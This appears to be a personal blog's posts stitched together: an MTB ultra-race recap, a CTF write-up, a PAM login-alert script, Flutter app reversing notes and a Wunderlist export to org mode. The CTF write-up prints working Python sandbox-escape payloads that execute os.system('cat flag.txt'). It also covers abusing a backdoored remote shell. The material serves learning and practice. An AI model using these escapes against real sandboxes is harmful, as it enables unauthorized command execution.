This past month marked the latest iteration of the 360one MTB and the culmination of months of training. In the end, it wasn’t just a race, but a journey that tested my limits and revealed an inner strength I wasn’t sure I possessed.


Back in October, I embarked on a hare-brained idea that would hopefully get me to race day. This involved getting my body accustomed to riding further than I had ever ridden before. Granted, much of that long-distance riding was due to my addiction to adventure. My training might not have been what other folks would have planned. Most of my focus was spent on building my different energy systems using the TrainerRoad platform, which involved a lot of indoor work, supplemented with the occasional longer outdoor ride to test different pieces of kit or nutrition strategies. One of the trickier elements I had to contend with, that most others didn’t, was having the fasting month of Ramadan fall one month before race day. This meant I had to be done with the majority of my training before the start of the fasting month. Once the fasting began, the focus was simply on maintenance and ensuring I didn’t lose any fitness or become sick.

Race Day

Race day was a whirlwind of excitement, anxiety, and relentless rain. The cold downpour drenched us before the starting gun even fired, setting the stage for the challenging 25 hours ahead.

The race was a rollercoaster, not just in terms of terrain, but also the physical and mental trials. One of my concerns was my choice of tires. I had slick Vittoria Terreno dry tires, designed for dry, hard-pack conditions, yet they surprised me with their exceptional handling in the muddy conditions. I also grappled with numbness in my hands and feet and bouts of sleepiness that seemed to hit at the most inopportune times. While numbness is generally normal on long-distance rides, the combination of the cold and rain resulted in me being unable to shift gears (the mud probably didn’t help either).

Nutrition was another challenge. The harsh conditions made eating on the move difficult, forcing me to catch up at the water points, which was far from ideal. The cold made it impossible to keep my nutrition in my jersey pockets or my tri bag (my preferred storage choice). Unfortunately, with only the tri bag being an option (not a great one given the mud), I had to rely on liquid nutrition for the most part.

Despite these hurdles, there were moments of camaraderie that shone brightly. My riding partner for the later half of the race, Mike Rollers, found just before check point 2 and then ended up giving me company and coaching me through the later half of the race when things got kinda dark. Without Mike’s kind words and patience, I really think I might not have made it across the finish line.


In the end, it was worth it. Not only did I finish the race, but I also beat my stretch goal of 26 hours, finishing in 25 hours and 39 minutes, including stops. Most people couldn’t really comprehend that I managed to do the race on a gravel bike as a first timer and given the conditions. On some level it felt great to prove everyone wrong and demonstrate just what these machines are capable off (though I suspect the race winner finishing on a gravel bike probably drove that point home much more succinctly).

The 36ONE was a revelation. It taught me about endurance, resilience, and the power of the human spirit. It showed me how to lean into the pain and push through the darkest moments. If you’ve ever contemplated an ultra-distance race, I say, go for it. It’s tough, grueling even, but the indescribable feeling of accomplishment is worth every pedal stroke.


I joined the second HackSouth team a bit late so some of the challenges were already sovled by the time I looked at them. This post is mostly my raw thoughts and flow as I solved the challenges and cleaned up a bit thanks to hindsight.

Reversing - Alienware

Difficulty 2/4

  • windows binary (wine isnt enough) (or maybe if you are better than me its enough)
  • decompile binary with ghidra and use x64dbg to debug it
  • step through and wait for a secondary dll to be dumped to disk
  • decompile this binary and see that its encrpyting files in your users<username>\docs folder
  • restart the debug session step into the code now with the folders created with some test data in the docs folder.
  • extract the key from memory (16 byte , hex qword)
  • start documenting the code for the encryption to understand it better
  • realize there is no decrypt in the binary
  • start writing c++ code to decrypt the file using windows crypto api
  • waste eons getting the params wrong ( thanks to those that helped with this)
    • demo code ripped from here in the hopes it would compile out of the box
    • it did not
    • fix the code so that it compiles
    • continue getting params right
  • finally get the params right , test it on the file we encrypted earlier
  • see that it works and decrypt the pdf file that was along side the binary
  • flag is in the file
  • Having a look at other solutions to this challenge , it looks like you could have patched the call to the encrypt with a call to decrypt, I would have not thought that would have worked as the params are different but that fact that it gave others the solution meant I need to do a bit more testing/research.

Reversing - backdoor

Difficulty 2/4

  • this was a two part challenge since up front it showed that we needed to connect to a docker container to get the flag.
  • running the binary didnt output anything except when hitting ctrl + c you would see a python script
  • basic recon on the binary didnt give to much more away except that it was using embeded python.
  • tried a few existing tools to get the info out
  • turns out you could just use the archive viewer (pyi-archive_viewer) provided by pyinstaller to view the archive and extract the python script called bd
  • the script is in pyc compiled format and while we can see a string that looks like a password from outputting the file to the terminal, using this password on remote server doesnt do anything but close the connection.
  • time to decompile the code
  • none of the decompilers work
  • there is no python header in the pyc file which is why all the decompilers fail.
  • get the correct magic string for the python version being used and add it to the start of the file
  • decompilers now work (decompyler6)
  • we can now understand what the flow is for the remote server
  • provide a password in md5 format
  • then send a command you want to execute in the format they want e.g. ‘command: ls’
  • i intially missed that you needed to specify the lenth of the command so most of my commands failed initially
  • finally sent through the required code to allow for a long buffered command
  • at which point i could just cat the flag.

Misc - input as a service

  • This is a python sandbox escape
  • Took a while to figure out what was allowed or not allowed.
  • Finally realized that the built ins were still availble.
  • Looking at other folks solutions it looks like i could have just used open (the python function) as well to read the flag directly.
    • e.g. print(open(‘flag.txt’).read())
  • simply use the import to import the os name space and call ‘cat flag.txt’ to get the flag (you could do ls first to find the file)
    • import(‘os’).system(‘ls’)
    • import(‘os’).system(‘cat flag.txt’)

Misc : Build yourself in

  • This was a python shell escape again
  • This challenge really gave me a headache
  • So in theory i was ready for another sandbox escape , except now pythons exec was used and all builtins besides the print function were removed.
  • What this functionally meant is it was very tedious to test anything until you got access to the builtin functions some how.
  • To make matters worse you werent allowed to use quotes in your exploit
  • The solution i took was to find the subclass object locally and then find the correct index to the globals import to get access to the built in functions locally and hope they matched remotely.
  • Once i had them available locally i could in theory run the same code remotely without the indexes changing as long as i used the same python version (which i did).
  • To get things going i first stored all the global functions in a short variable
  • a = ().class.bases[0].subclasses()[94].init.globals.values()
  • I then extract the chr function to convert numbers to chars so that we dont have to worry about indexes
  • chr = [a for a in [x for x in a].pop(5).values()].pop(14)
  • I then wrote a small function that genrated the chr concats required to make a string i needed , this let me setup imports and the os call for example
  • flag = chr(99) + chr(97) + chr(116) + chr(32) + chr(102) + chr(108) + chr(97) + chr(103) + chr(46) + chr(116) + chr(120) + chr(116);os = chr(111) + chr(115);ls = chr(108) + chr(115);imp = chr(95) + chr(95) + chr(105) + chr(109) + chr(112) + chr(111) + chr(114) + chr(116) + chr(95) + chr(95);blt = chr(95) + chr(95) + chr(98) + chr(117) + chr(105) + chr(108) + chr(116) + chr(105) + chr(110) + chr(115) + chr(95) + chr(95);
  • finally once all that was done i could simply index the globals dictionary and use the strings i build to cat the flag out
  • ().class.bases[0].subclasses()[94].init.globals[blt]imp.system(flag);
  • the full exploit had to be concatted to one line as seen below to execute correctly on the remote server.
  • a = ().class.bases[0].subclasses()[94].init.globals.values();chr = [a for a in [x for x in a].pop(5).values()].pop(14);flag = chr(99) + chr(97) + chr(116) + chr(32) + chr(102) + chr(108) + chr(97) + chr(103) + chr(46) + chr(116) + chr(120) + chr(116);os = chr(111) + chr(115);ls = chr(108) + chr(115);imp = chr(95) + chr(95) + chr(105) + chr(109) + chr(112) + chr(111) + chr(114) + chr(116) + chr(95) + chr(95);blt = chr(95) + chr(95) + chr(98) + chr(117) + chr(105) + chr(108) + chr(116) + chr(105) + chr(110) + chr(115) + chr(95) + chr(95);().class.bases[0].subclasses()[94].init.globals[blt]imp.system(flag);

Misc - alien camp

  • question answer service
  • connect to a remote service calculate a value and send the correct answer as fast as possible.
  • The values printed when asking for questions are emoji’s
  • Steps to solves are :
    • Connect using pwn tools
    • request option 1
    • parse the strings and store the emoji -> number mapping
    • request option 2
    • parse the string out and replace the emojis with their correct number mappings
    • pass the string to pythons eval
    • send the response back using pwn tools send_raw
    • let the program run for all 500 questions and then the flag will be printed.
  • This is a fairly common challenge and the biggest time waste for me here was thinking i needed to use the emoji hex values as the numbers, once i realized there was a mapping it was pretty simple.

Hardware : serial logs

  • Recon : Download the file , extract and see whats available
  • Initial display shows its a zip
  • extract shows a binary data file
  • load file into hex editor
  • file has a magic string that points to
  • Download app and load file
  • digital logic analyzer trace shows up in a raw form
  • do more recon to find out how the the logs were captured (i.e. what protocol)
  • confirm that the logs are async serial in the app which effectively translates to uart
  • once the analyzer is selected raw hex is displayed
  • This is not correct , most likely thing that is wrong is the baud rate
  • Sad to say but i initially just brute forced choosing the different baud rates
  • find the correct baud rate by looking at the stream data and seeing raw text being output
  • do some initial analyst to see if the long strings being output are related to the challenge (they are not)
  • see that the stream terminates indicating that the baud rate has changed again.
  • Clear out the old logs to make it easier to analyze
  • check the high voltage edges and measure their time and use this to calculate the baud rate
  • formula used is 1/(high edge) * 10^6 = 1/(13.4) * 10^6 ( not the value here is just an example go check the trace for actual value)
  • this gives you the bit rate which you can round up and enter as a custom baud rate into logic 2’s analyzer
  • you should now see the clean logs and the last line has the flag.

Hardware : Compromised

  • We know that its a logic 2 file this time so skip a lot of intial recon steps
  • this trace has a new protocl which is I2C
  • load the correct analyzer
  • change the output into ascii
  • you should see that there are commands and data being sent to 2 devices
  • export the stream to csv (add screenshot here showing how)
  • import the stream into google sheets or excel
  • filter only on the contents being sent to the ‘,’ device (this is the ascii value)
  • scroll to the bottom of the trace and the flag is listed downwards
  • copy the flag out and paste it into an editor and concat the lines into a single line string


For the longest time I had the idea to implement a notification system that would alert you if someone ever logged in (or tried to login using a known password of yours).

Whether this was achieved from a previously compromised online account or just from guessing based on your personality. The objective should be that you are alerted as soon as possible. To this end I remember an app that was built by haroon@thinkst eons ago that worked on MacOS ( and took a picture of who ever disturbed the mac’s screensaver.

I wanted to achieve something simliar for Linux and then hopefully windows at some point but only when someone tried to login using a known password (in theory it could be on any login). While the current implementation doesnt take a snapshot since its only hooked up to the ssh auth, you could in theory hook it up the a systems GUI login and capture those login attempts as well.

Initial Research

After some basic investigations I found that this can be done fairly easily using a Pluggable Authentication Module (PAM) module. This was its fairly dynamic and no major system changes are required.


The final implementation was built using the pam_script module which lets you hook into PAM and call a shell script of your choice.

First we need to grab a copy of pam_script repo located @ Once downloaded compile and install the library with the following commands :

cd pam_script #Assuming you arent already in the folder
autoreconf -i
make install

Once intalled we need to configure pam by adding the line below to the following file (/etc/pam.d/sshd). This location is based on my current setup and may differ depending on how pam is configured.

auth      optional

Once we have pam configured we need to modify the script that is called when a user fails to login. On my system this is located @ /usr/local/etc/pam_script_auth. Note by default this is linked to a script located in the same folder , either modify the linked script or created a new script and update the link. I took the path of creating a new script and updating the link. You can find the demo script below.

#! /bin/sh

if [ $PAM_USER = "rc1140" ] && [ $PAM_AUTHTOK = "ThePoliceHaveMe" ]; then
  echo "the police are here" >> /tmp/alerts
  curl ''

# success
exit 0

The script itself doesnt do much aside from echo’ing some text to a file and then calling a canary token. The canary token works nicely here since you can send the alert notification with very minimal infrastructure and without indicating who has been alerted. I tend to restart the ssh service to ensure that the pam modifications are loaded but this is probably not needed


That’s it really, you can probably make this way more complicated and covert with a full pam module or by modifying the source for the different login applications. The PAM method does provide a more generic and pluggable method though. Additionaly using pam_script makes this even more dynamic and easy to implement.


Having had to recently reverse an android application that was built using the flutter framework I figured this is as good a time as ever to record my thoughts now that I acheived what I wanted roughly out of exercise.


The primary goal was to figure out what type of api the app was using and then extract the api out into a library so that it could be used for another automation project.

Aside from that I wanted to know if the app was possibly leaking any sensitive info.


The issues encountered below were basically encountered over the course of the project and were not really known to me up front.

The app was compiled with flutter and presented a number of issues listed below.

  • Code is compiled and executed using the dart vm when in release mode (this should be the case with a black box test).
  • The application does not use the system proxy.
  • The application does not use the user installed ca certs as it has a number of certs compiled into the app.
  • What ever java code is included is usually in kotlin (though this may not always be the case).
  • In the case of a black box app, it will likely have only been compiled with arm binaries and such cant be used in an emulator (unless you have the patience of a saint).

Initial plan of attack and subsequent updates

Initially I had planned to simply disasemble the apk, convert everything to classes and pull out the required http calls from the code. This is an approach that has worked fairly well before for me but because of the amount of compiled code this approach wasnt viable this time.

While I had the app unpacked some basic recon showed that the app was likely built with the flutter framework by google and suplemented by some native code which talked to a number of google services (firebase and a few others popped out based on their config).

It should be noted at this point that I didnt have a rooted device with which to test the application (most guides require a rooted phone to use the applications that force an apps traffic through a proxy).

With the disassembly not giving up any clear distinct api calls, I procceeded to try some dynamic analysis. This ended up being one of those sad yak shearing moments with me trying one emulator after another trying to find one that worked decently and let me run the application. In the end, this proved to be pointless as I couldnt get an arm image running and the binaries within the application was compiled for arm only and would not run within any of the emulators. I did not go down the route of using the arm avd images as they were just frustratingly slow.

What worked

After wasting a bunch of time trying to get the app analysed on an emulator I finally dug out an old android device went through the pain of rooting it and then followed the guide below.

If you dont feel like reading the entire guide , the tldr; is to root your device, install your proxy cert as a system cert setup a gateway device on your network and then setup a transparent proxy on that gateway. In the end this actually worked and I finally managed to intercept the calls for the app. Luckily I did not have to deal with root detection in the app or I would have needed even more time to analyze it.

Conclusion, follow up research and other notes

In the end I managed to get the api calls I wanted, but this entire process felt like a pain of note. One other means of analysis that I brifly did while trying to get the app running in the vm was to pull down multiple older copies of the app to find a version that wasnt using flutter. This sort of worked and I managed to get some extra actionable intelligence about the app but it felt like another yak shearing session as the api code seems to be generated from a definition file of sorts. Translating that to useable felt like it woudl have taken too long and would have still required me to figure out the config params from the kotlin code which was driving me crazy in its decompiled form.

Thankfully though, now that this is all setup I can easily reuse the setup for further analysis.

If I get some time in the future I would like to setup a small project so that I can try and reverse the AOT compiled dart code and see if that could prove useful.


Sometime last year wunderlist was acquired by Microsoft and while this is awesome for them it left me with a dilemma of migrating to Microsoft’s to-do application or finding an alternative.

Sadly MS’ TODO application failed to migrate all my tasks (well any tasks) from wunderlist. This left me with finding an alternative instead. Sadly since the announcement was made I honestly haven’t found anything simple + functional + fast enough to replace wunderlist.

Recently though I have started using Emacs’s org mode significantly more and more. This combined with the awesome orgzly application that was suggested somewhere on the net, meant that I finally had a solution to the wunderlist migration. The beauty of using org files for my todos + agenda is that its a simple text file which means syncing is super simple and it caters for all my needs. Making matters even better was that I could now dump the wunderlist data (which they provide in JSON) and spit out a super simple org mode file and happily continue.


The code to handle the conversion is fairly simple and is simply a matter of finding all the incomplete tasks and grouping them by the lists they were in. This code leaves much to be desired but its pretty much a dump from my ipython history so go easy on me ;P

Running the script will dump the output to stdout. Feel free to pipe this to a file or optionally change the code to write directly to file.